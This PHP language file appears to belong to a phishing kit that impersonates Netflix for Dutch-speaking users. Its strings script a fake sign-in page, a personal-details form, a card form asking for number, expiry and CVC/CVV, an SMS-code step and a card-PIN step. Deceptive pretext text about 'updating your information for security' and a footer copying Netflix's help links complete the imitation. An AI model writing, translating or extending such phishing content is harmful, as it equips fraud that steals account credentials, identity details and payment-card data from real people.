<?php

function lang($phrase){
    static $lang = array(
        "xlang" => "nl",
        "xcapt" => "Neem even de tijd om de hCaptcha hieronder op te lossen. Het helpt ons ervoor te zorgen dat je een echte gebruiker bent en geen bot, en biedt een veilige omgeving voor iedereen.",
        "xcapt1" => "Vink het vakje CAPTCHA aan.",
        "xcapt2" => "Verificatie",
        "xcapt3" => "Doorgaan",
        "xmain1" => "Aanmelden",
        "xmain2" => "E-mail of telefoonnummer",
        "xmain3" => "Voer een geldig e-mailadres of telefoonnummer in.",
        "xmain4" => "Wachtwoord",
        "xmain5" => "Je wachtwoord moet tussen 4 en 60 tekens bevatten.",
        "xmain6" => "Aanmelden",
        "xmain7" => "Onthoud mij",
        "xmain8" => "Hulp nodig?",
        "xmain9" => "Nieuw bij Netflix?",
        "xmain10" => " Meld je nu aan.",
        "xmain11" => "Deze pagina wordt beschermd door Google reCAPTCHA om ervoor te zorgen dat je geen bot bent.",
        "xmain12" => "Meer informatie.",
        "xinfoz1" => "Persoonlijke informatie",
        "xinfoz2" => "Voornaam en achternaam",
        "xinfoz3" => "Dit veld is verplicht.",
        "xinfoz4" => "Geboortedatum",
        "xinfoz5" => "Adres",
        "xinfoz6" => "Stad",
        "xinfoz7" => "Postcode",
        "xinfoz8" => "E-mailadres",
        "xinfoz9" => "Telefoonnummer",
        "xinfoz10" => "De velden in dit formulier zijn verplicht omdat we deze informatie nodig hebben om je verzoek te verwerken.",
        "xinfoz11" => "Doorgaan",
        "xpay1" => "Stel je betaalkaart in",
        "xpay2" => "Kaartnummer",
        "xpay3" => "Kaartnummer vereist.",
        "xpay4" => "Vervaldatum",
        "xpay5" => "Vervaldatum vereist.",
        "xpay6" => "CVC/CVV",
        "xpay7" => "CVC/CVV vereist.",
        "xpay8" => "End-to-end versleuteld",
        "xpay9" => "Doorgaan",
        "xsms1" => "Verificatie",
        "xsms2" => "Voor je veiligheid moeten we controleren of jij het echt bent.",
        "xsms3" => "We sturen je een SMS met een beveiligingscode",
        "xsms4" => "Voer de ontvangen code in",
        "xsms5" => "SMS-code",
        "xsms6" => "Ongeldige SMS-code",
        "xsms7" => "Deze stap is nodig om je verzoek veilig te verwerken.",
        "xsms8" => "Doorgaan",
        "xpin1" => "Verificatie",
        "xpin2" => "Voor je veiligheid moeten we controleren of jij het echt bent.",
        "xpin3" => "We sturen je een SMS met een beveiligingscode",
        "xpin4" => "Voer de pincode van je kaart in",
        "xpin5" => "PIN-code",
        "xpin6" => "Ongeldige PIN-code",
        "xpin7" => "Deze stap is nodig om je verzoek veilig te verwerken.",
        "xpin8" => "Doorgaan",
        "xexpl1" => "Bijwerken",
        "xexpl2" => "We hopen dat deze communicatie je goed bereikt. We willen je informeren dat het essentieel is om je informatie op ons platform bij te werken om een ​​voortdurende en veilige gebruikerservaring te garanderen.",
        "xexpl3" => "Om onze services te verbeteren en de beveiliging van je account te waarborgen, vragen we je om je informatie bij te werken.",
        "xexpl4" => "Doorgaan",
        "xconf1" => "Bevestiging",
        "xconf2" => "We danken je hartelijk voor het bijwerken van je informatie op ons platform. Je toewijding aan de beveiliging en nauwkeurigheid van je accountgegevens is cruciaal voor ons.",
        "xconf3" => "Je wijzigingen zijn succesvol opgeslagen. Je kunt nu volop genieten van ons platform met de nieuwste en up-to-date informatie.",
        "xconf4" => "Doorgaan",
        "xload1" => "Bezig met verwerken...",
        "xload2" => "Verlaat deze pagina niet.",
        "xfoot1" => "Vragen? Neem contact met ons op.",
        "xfoot2" => "FAQ",
        "xfoot3" => "Helpcentrum",
        "xfoot4" => "Gebruiksvoorwaarden",
        "xfoot5" => "Privacy",
        "xfoot6" => "Cookievoorkeuren",
        "xfoot7" => "Bedrijfsinformatie",
        "xfoot8" => "Nederlands"
    );

    return $lang[$phrase];
}
?>
